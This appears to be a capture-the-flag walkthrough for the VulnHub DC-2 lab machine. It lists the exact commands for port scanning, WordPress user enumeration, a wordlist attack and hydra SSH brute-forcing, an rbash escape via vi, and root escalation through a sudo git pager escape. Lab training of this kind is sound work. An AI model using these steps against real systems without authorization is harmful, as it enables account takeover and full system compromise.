Machine Link : https://www.vulnhub.com/entry/dc-2,311/ STEP1 nmap 192.168.0.131 -sSV -A -p- -vv FINDING PORT 80 IS OPEN SSH IS RUNNINGON PORT 7744 ----------------------------------------------------------------------------------------------------------- STEP2 ADD dc-2 TO HOST NAME namo /etc/hosts SAVE IT ----------------------------------------------------------------------------------------------------------- STEP3 OPEN SITE IN BROWSER HTTP://dc-2 FINDING ITS IS A WORDPRESS SITE GOT TO FLAG TAB OT GET FLAG IS SAYS FOR WORDLIST PASSWORD USE CEWL TO GENERATE PASSWORD ----------------------------------------------------------------------------------------------------------- STEP4 FIRST TO GET USER NAMES USE wpscan --url http://dc-2 -e at -e ap -e u admin jerry tom SAVE IT IN dc-2users.txt ----------------------------------------------------------------------------------------------------------- STEP5 TO GENERATE PASSWORD FOR THE SITE cewl http://dc-2 pdc3.txt ----------------------------------------------------------------------------------------------------------- STEP6 TO BRUTFORCE SSH USE HYDRA WITH hydra -L /root/Desktop/dc-2users.txt -P /root/Desktop/pdc3.txt -s 7744 192.168.0.131 ssh GOT ONLY ONE PASSWORD [7744][ssh] host: 192.168.0.131 login: tom password: parturient ----------------------------------------------------------------------------------------------------------- STEP7 LETS USE TO FIND THE LOGIN PAGE FOR WORDPRESS SITE dirsearch -u http://dc-2 FINDING http://dc-2/wp-login.php ----------------------------------------------------------------------------------------------------------- STEP8 USE TO GET PASSWORD FOR OTHER USERS wpscan --url http://dc-2 -U /root/Desktop/dc-2users.txt -P /root/Desktop/pdc3.txt [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient ----------------------------------------------------------------------------------------------------------- STEP9 NOW SSH ssh [email protected] -p 7744 -rbash IS THE SHELL NO COMMAND WILL WORK SO ESCAPE SHELL to bash or sh TO ESCAPE FROM rbash to STABLE SHELL vi :set shell=/bin/sh :shell TO GET CURRENT PATH $PATH /bin/bash echo $PATH export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH whoami tom CHANGE USER su jerry (pwd- adipiscing) jerry@DC-2:/home/tom$ sudo -l IT WILL SHOW (root) NOPASSWD: /usr/bin/git THEN https://gtfobins.github.io/gtfobins/git/#shell jerry@DC-2:/home/tom$ sudo /usr/bin/git branch --help config THEN TYPE !/bin/sh whoami root -----------------------------------------------------------------------------------------------------------